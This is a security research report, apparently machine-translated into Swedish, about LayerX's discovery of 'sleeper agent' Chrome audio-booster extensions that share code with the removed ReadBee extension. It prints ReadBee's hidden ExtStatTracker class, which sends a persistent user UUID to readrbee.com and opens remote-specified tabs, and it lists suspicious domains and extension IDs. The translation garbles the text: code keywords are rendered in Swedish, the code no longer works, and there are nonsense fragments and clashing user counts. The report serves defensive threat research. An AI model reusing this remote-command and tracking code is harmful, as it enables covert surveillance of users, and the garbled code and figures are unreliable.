LayerX har grävt fram ett nätverk av skadliga "sleeper agent"-tillägg som verkar fungera som infrastruktur för framtida skadlig aktivitet, för närvarande installerade på nästan 1.5 miljoner användare världen över.

 

LayerX har upptäckt ett nätverk av webbläsartillägg som verkar fungera som "sovande agenter" för framtida skadlig aktivitet. Tilläggen verkar alla ha utvecklats av samma person eller grupp, i väntan på sin "marschorder" för att köra skadlig kod på intet ont anande användares datorer. 

De tillägg som LayerX har identifierat verkar alla fokusera på ljudhantering i webbläsaren. Medan tilläggen försöker dölja sina gemensamma parametrar (gemensam kodbas, gemensamma externa kommunikationsdestinationer etc.) och försöker demonstrera legitim funktionalitet, avslöjar en analys av koden en helt annan historia:

  • Vanlig kod med kända skadliga tillägg: Vanliga kodmönster hittades i dessa tillägg som tidigare har identifierats som skadliga och tagits bort från Chrome Web Store.
  • Läser in externa konfigurationsfiler för att köra kommandon: De vanliga kodmönstren gör det möjligt för tillägget, bland andra funktioner, att exekvera fjärrinstruktioner utan att dessa kommandon visas i kodbasen, och därigenom kringgå traditionella kodskanningstekniker.
  • Öppna bakgrundsflikar och köra kommandon: Detta gör att tillägget kan köra kommandon utan att användaren vet om det. Exempel på sådana kommandon kan till exempel vara att komma åt en extern URL och ladda ner skadlig kod.
  • Kommunicera med kända skadliga webbadresser: Tilläggen kommunicerar med externa URL:er, inklusive kända skadliga domäner.
  • TrafikkrypteringTilläggen använder också kryptering och base64-kodförvirring för att kryptera extern kommunikation och förvränga deras beteende.

Naturligtvis verkar dessa funktioner inte ha någon legitim användning i förhållande till tilläggens förmodade funktion. 

För närvarande har LayerX identifierat fyra sådana tillägg (se nedan för fullständig information), med över 1.2 miljoner användare världen över. LayerX undersöker också för närvarande flera ytterligare tillägg som verkar vara kopplade till den här kampanjen. Alla tillägg är fortfarande tillgängliga i Chrome Store.

 

En vanlig, skadlig kodbas

Även om tilläggen inte verkar vara externt relaterade, dela en gemensam kodbas med många återkommande funktioner och datastrukturer, vilket indikerar en enda utvecklare eller grupp bakom dem.

Kritiskt nog verkar de dela infrastrukturkod med ett tillägg som tidigare har tagits bort från Chrome Web Store på grund av skadlig aktivitet: ReadBee (tilläggs-ID: phjbepamfhjgjdgmbhmfflhnlohldchb) var ett populärt Chrome-tillägg som inkluderade dold infrastruktur för skadlig aktivitet. Det togs senare bort från Chrome Web Store efter att ha kopplats till omdirigering av trafik och potentiellt affiliate-bedrägeri, och vissa... säkerhetsforskare flaggade det för misstänkta behörigheter och beteende.

Ocuco-landskapet ExtStatTracker klassen i ReadBee spårar tyst installationer, avinstallationer och uppdateringar genom att skicka kodad användardata – inklusive ett permanent UUID – till readrbee.com. Det kan också öppna godtyckliga webbadresser i nya flikar, vilket effektivt fungerar som en fjärrkommandokanal. Denna telemetrilogik är inbäddad i bakgrundsskriptet och är inte avslöjas för användarna, vilket bekräftar förekomsten av skadlig infrastruktur.

ReadBees bakgrundsskript innehåller en komponent som heter ExtStatTracker, som fungerar som en infrastruktur för fjärrkontroll och telemetri. Den kodar data med hjälp av btoa och lägger till den i nätverksförfrågningar som skickas till readrbee.comDet här systemet gör det möjligt för fjärrservern att skicka konfigurationsuppdateringar och till och med öppna godtyckliga flikar med hjälp av chrome.tabs.create(). 

En fördel med den här konfigurationen är flexibilitet: till exempel kan ett element-ID för övervakning i innehållsskriptet levereras på distans, vilket undviker hårdkodad logik och gör det enklare att kringgå statiska säkerhetsverktyg. Kommunikation mellan komponenter sker via chrome.storage, vilket möjliggör ihållande, tyst samordning. Denna dolda infrastruktur uppvisar tydliga tecken på skadlig avsikt genom tyst spårning, dynamisk beteendeinjektion och avsiktligt kringgående av säkerhetsmekanismer.

klass ExtStatTracker {

    konstruktör() {

        detta.installUrl = “https://readrbee.com/install/" detta.avinstallationsadress = “https://readrbee.com/uninstall/" detta.konfiguration = {}, detta.kö = [], detta.hash = "", detta.köProcessorReady = !1, detta.uid = "", detta.version = chrome.runtime.getManifest().version, ee = “odefinierad" == sorts fönster? globalThis: fönster, detta.initStorage(), detta.initListeners()

    }

    processkö() {

        för (; detta.kö.längd > 0; ) {

            var t = detta.kö.skifta();

            if (!t.typ || "handling" != t.typ) avkastning !0;

            var e = "p=" + encodeURI-komponent(btoa(JSON.stränga({

                id: chrome.runtime.id,

                v: detta.version,

                handling: t.action,

                uid: detta.uid,

                hash: detta.hasch,

                tDatum.nu()

            })));

            hämta(detta.installUrl + "?" + e).sedan((t => t.json())).sedan((fungera(t) {

                t && 1 != okej && (t.url && chrome.tabs.skapa({

                    URL: t.url

                }), extStatTracker.sparaKonfiguration(t))

            }))

        }

    }

    angeAvinstallationsurl() {

        var t = "p=" + encodeURIComponent(btoa(JSON.stringify({

            id: chrome.runtime.id,

            v: detta.version,

            handling: "Avinstallera",

            uid: this.uid,

            tDatum.nu()

        })));

        chrome.runtime.angeAvinstallationsURL(detta.avinstallationsurl + "?" + t)

    }

    initListeners() {

        chrome.runtime.onInstallerad.addListener((t => {

            detta.kö.tryck({

                Typ: "handling"

                handling: t.reson

            }), detta.köProcessorReady && detta.processkö()

        }))

    }

    initStorage() {

        chrome.storage.local.skaffa sig((t => {

            t && t.config && (extStatTracker.config = t.config), extStatTracker.config.uid ? extStatTracker.uid = extStatTracker.config.uid : (extStatTracker.uid = extStatTracker.config.uid = crypto.)slumpmässigUUID(), extStatTracker.sparaKonfiguration()), extStatTracker.hash = extStatTracker.config.hash, extStatTracker.queueProcessorReady = !0, extStatTracker.angeAvinstallationsurl(), extStatTracker.processkö()

        }))

    }

    sparaKonfiguration(t = !1) {

        t = t || extStatTracker.config, chrome.storage.local.skaffa sig({

            config: {}

        }, (e => {

            Objekt.tilldela(e.config, t), chrome.storage.local.in({

                confige.config

            })

        }))

    }

}

const extStatTracker = ny ExtStatTracker;

Denna infrastruktur är inte unik för ReadBee – liknande skadliga kodstrukturer har även hittats i andra tillägg. Till exempel Sök i ChatGPT förlängning (acagjkjeebjdmeipgmhcmaddekfmdbaj) använde samma kommunikations- och kontrollmönster och togs bort från Chrome Web Store den October 25, 2024 , på grund av skadlig kod.

 

Kommunikation med skadliga webbadresser:

Några av domänerna som dessa tillägg kommunicerar med har flaggats som kända skadliga webbadresser på VirusTotal:

  • https://francjohn[.]com/api/action/

En annan domän som tilläggen ses för kommunikation med är:

  • https://jermikro[.]com/api/

Tre av tilläggen kommunicerar med den här domänen. Även om själva domänen inte har flaggats som skadlig, har den underliggande programvaran för domänen tidigare flaggats för skadlig aktivitet.

Dessutom använder tilläggen olika krypteringstekniker i koden för att kryptera extern kommunikation och dölja deras beteende.

 

Förvirring av gemensamt ägande

En annan viktig faktor är att även om tilläggen alla verkar dela en gemensam kodbas (åtminstone för de skadliga bitarna), ett gemensamt tema (alla verkar vara centrerade kring ljudhantering i webbläsaren) och gemensam extern kommunikation, så visar de utåt sett olika ägarskap:

  • Varje tillägg listas under en annan utgivare, med olika kontaktuppgifter.
  • Inget av tilläggen har offentliga webbplatser.
  • Kontaktinformationen för varje tillägg leder till anonyma webbmailkonton.

Som ett resultat är det omöjligt att fastställa identiteten på personerna bakom vart och ett av dessa tillägg.

 

Misstänkta skadliga tillägg:

Nedan följer den aktuella listan över misstänkta skadliga tillägg som identifierats som en del av denna ring:

Tilläggsnamn Tilläggs-ID användare
Ljudförstärkare pmilcmjbofinpnbnpanpdadijibcgifc 200,000
Undersök källkoden för Volume Max – Ultimate Sound Booster mgbhdehiapbjamfgekfpebmhmnmcmemg 1,000,000
Volymmästare: Bemästra ditt ljud eoejmjkddfbhhnbmklhccnppogeaeah 3,000
Volymförstärkare: Ultimat ljudförstärkare dlcgileladmbfijjmnleehhoebpggpjl 2,000

Ytterligare bekräftelse på VirusTotal

Även om VirusTotal mest är känt som ett arkiv för att flagga domäner/IP-adresser för C2-servrar (kommando- och kontrollservrar för skadlig kod), innehåller det även viss data om tillägg.

Tillägget ”Examine source code of Volume Max – Ultimate Sound Booster”, med över en miljon nedladdningar, har redan flaggats av flera leverantörer. Det togs dock inte bort från Chrome Web Store.



På liknande sätt har tilläggen "Sound Boster" (över 200,000 XNUMX användare) också flaggats som skadliga av vissa säkerhetsföretag. Även de är fortfarande tillgängliga i Chrome Web Store.


Implikationer:

Analysen av tilläggen pågår fortfarande, men hittills har LayerX inte identifierat några ström skadliga aktiviteter (förutom kopplingar till kända skadliga tillägg). Istället verkar detta vara en plattform or infrastruktur för potentiell framtida skadlig aktivitet. Det är därför vi kallar det för ett "sovande" utökningsnätverk.

Denna typ av "sovande" tilläggsnätverk kan fungera som ett substitut för traditionella botnät. Även om det kan vara långsamt, tekniskt komplext och besvärligt att bygga upp botnät (vanligtvis på exponerade IoT-enheter), är det mycket enklare att utveckla ett nätverk av skadliga webbläsartillägg och kan ge direkt åtkomst till viktig användaridentitetsinformation såsom cookies, lösenord, webbläsardata och webbinnehåll.

Det finns några viktiga slutsatser här:

  1. Även till synes oskyldiga tillägg kan vara skadligaI det här fallet, även om vi inte såg något aktivt skadligt beteende, identifierade vi flera länkar till kända skadliga tillägg och/eller domäner, och kod med funktioner som inte hör i tillägg med de annonserade funktionerna.
  2. Utgivarens rykte är ett svart hålVem som helst kan ladda upp ett tillägg, och det är praktiskt taget omöjligt att spåra personerna bakom dessa tillägg. I det här fallet, trots alla gemensamma nämnare, leder tilläggen tillbaka till generiska webbadresser och inga offentliga webbplatser, och det finns inget sätt att se vem som ligger bakom dem.
  3. Säkerhet för tillägg är en kontinuerlig process: Det är inte en engångsföreteelse, och till synes oskyldiga tillägg kan bli skadliga, eller så kan skadliga funktioner slås på/av. Det är därför det är avgörande att kontinuerligt övervaka dina webbläsartilläggs hotbild och säkerhetsstatus.